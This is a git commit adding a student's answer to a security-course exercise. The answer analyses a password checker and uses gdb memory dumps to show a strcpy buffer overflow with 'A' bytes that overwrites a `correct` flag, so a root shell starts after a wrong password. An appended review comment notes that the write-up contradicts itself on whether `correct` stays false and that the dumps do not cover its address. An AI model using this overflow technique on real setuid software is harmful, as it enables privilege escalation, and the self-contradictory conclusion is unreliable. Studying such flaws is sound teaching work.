author: Camil Staps 2015-11-30 22:08:58 +0100
committer: Camil Staps 2015-11-30 22:08:58 +0100
commit: d7c4536c91ddd307fc9b99984ac49b5b5459b485 (patch)
tree: 135749c25cda6177b7712ae425d9559b625f20e0 /CamilStaps-s4498062-Assignment-3/ex2
parent: Initial commit (diff)
Assignment 2, 3
Diffstat (limited to 'CamilStaps-s4498062-Assignment-3/ex2')
-rw-r--r-- CamilStaps-s4498062-Assignment-3/ex2 50
1 files changed, 50 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-3/ex2 b/CamilStaps-s4498062-Assignment-3/ex2
new file mode 100644
index 0000000..1a43891
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-3/ex2
@@ -0,0 +1,50 @@
+a
+ If there is no cli argument, the program aborts.
+ Otherwise, checkpass() is called with the argument.
+ The crypt library is used to compute a hash of the argument with some salt.
+ According to http://www.gnu.org/software/libc/manual/html_node/crypt.html,
+ the best way to recover the password is to launch a brute force attack.
+
+b
+ Before strcpy, the stack is 'normal':
+
+ ...
+ (gdb) ni
+ 0x0000000000400840 14 strcpy(password,input);
+ ...
+ => 0x0000000000400840 <checkpass+42>: e8 2b fe ff ff call 0x400670 <strcpy@plt>
+ (gdb) x /64bx $rsp
+ 0x7ffe8a0fdd60: 0x78 0x5d 0x3b 0xaf 0x29 0x7f 0x00 0x00
+ 0x7ffe8a0fdd68: 0x53 0xf4 0x0f 0x8a 0xfe 0x7f 0x00 0x00
+ 0x7ffe8a0fdd70: 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00
+ 0x7ffe8a0fdd78: 0x30 0x08 0x00 0x00 0x01 0x00 0x00 0x00
+ 0x7ffe8a0fdd80: 0xb0 0xde 0x0f 0x8a 0xfe 0x7f 0x00 0x00
+ 0x7ffe8a0fdd88: 0x38 0x4f 0xba 0xaf 0x29 0x7f 0x00 0x00
+ 0x7ffe8a0fdd90: 0xe0 0xde 0x0f 0x8a 0xfe 0x7f 0x00 0x00
+ 0x7ffe8a0fdd98: 0x00 0x75 0xba 0xaf 0x29 0x7f 0x00 0x00
+
+ But, because we're copying more characters than `password` can hold, after
+ strcpy, the stack is corrupted:
+
+ (gdb) ni
+ ...
+ (gdb) x /64bx $rsp
+ 0x7ffe8a0fdd60: 0x78 0x5d 0x3b 0xaf 0x29 0x7f 0x00 0x00
+ 0x7ffe8a0fdd68: 0x53 0xf4 0x0f 0x8a 0xfe 0x7f 0x00 0x00
+ 0x7ffe8a0fdd70: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+ 0x7ffe8a0fdd78: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+ 0x7ffe8a0fdd80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+ 0x7ffe8a0fdd88: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+ 0x7ffe8a0fdd90: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+ 0x7ffe8a0fdd98: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+
+ In particular, the value of `correct` is now 0x41:
+
+ (gdb) x &correct
+ 0x7ffe8a0fde8f: 0x41
+
+ which is truthy.
+ The hash is computed normally, the strcmp call evaluates to non-zero, so the
+ string `ERROR: password incorrect` is printed, however, correct stays false.
+ Because of this, a root shell is started.
+
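Review bot: The conclusion in part b contradicts itself: the write-up first states that `correct` now holds 0x41, "which is truthy", and then says "however, correct stays false" before concluding that a root shell is started. For the shell to be started after `strcmp` returns non-zero, `correct` must have remained non-zero (0x41) despite the failed comparison, so that sentence should read that `correct` stays truthy, not false. Also, the two `x /64bx $rsp` dumps cover 0x7ffe8a0fdd60 to 0x7ffe8a0fdd9f, while `&correct` is at 0x7ffe8a0fde8f, so the dumps do not actually show the overwrite of `correct`; dumping a range that includes `&correct` (or the span between `password` and `correct`) before and after the `strcpy` would make the evidence match the claim. Finally, the root cause named in the text, copying more bytes than `password` can hold, deserves one sentence on the fix (a length-bounded copy or an explicit check of `strlen(input)` against the buffer size), since the assignment asks what goes wrong and that is the defect being described.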